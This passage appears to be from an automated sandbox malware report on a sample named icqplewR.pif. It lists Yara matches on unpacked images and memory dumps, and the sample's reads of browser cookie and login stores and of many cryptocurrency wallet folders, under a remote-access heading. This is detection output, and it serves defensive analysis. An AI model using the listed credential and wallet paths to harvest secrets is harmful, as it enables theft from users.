Source: Yara match File source: 20.2.icqplewR.pif.1e045570.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1ce90000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cee0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.icqplewR.pif.1b19f4f8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cd1eeae.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cd1eeae.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1e046478.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1ce90000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1e062d90.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.icqplewR.pif.1b19f4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1e062d90.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1ce90f08.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cd1fdb6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1e046478.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cd1fdb6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1e045570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000003.1351645830.000000001B19F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1225845544.00000000202BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1439549690.000000001E045000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1438467684.000000001CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1438171646.000000001CCDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1438299753.000000001CE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: icqplewR.pif PID: 8032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: icqplewR.pif PID: 7444, type: MEMORYSTR
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\Links\icqplewR.pif File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Remote Access Functionality

Source: Yara match File source: 20.2.icqplewR.pif.1ce90f08.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1e045570.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1ce90000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cee0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.icqplewR.pif.1b19f4f8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cd1eeae.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cd1eeae.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1e046478.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1ce90000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1e062d90.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.icqplewR.pif.1b19f4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1e062d90.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1ce90f08.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cd1fdb6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1e046478.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1cd1fdb6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.icqplewR.pif.1e045570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000003.1351645830.000000001B19F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1225845544.00000000202BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1439549690.000000001E045000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1438467684.000000001CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1438171646.000000001CCDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1438299753.000000001CE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: icqplewR.pif PID: 8032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: icqplewR.pif PID: 7444, type: MEMORYSTR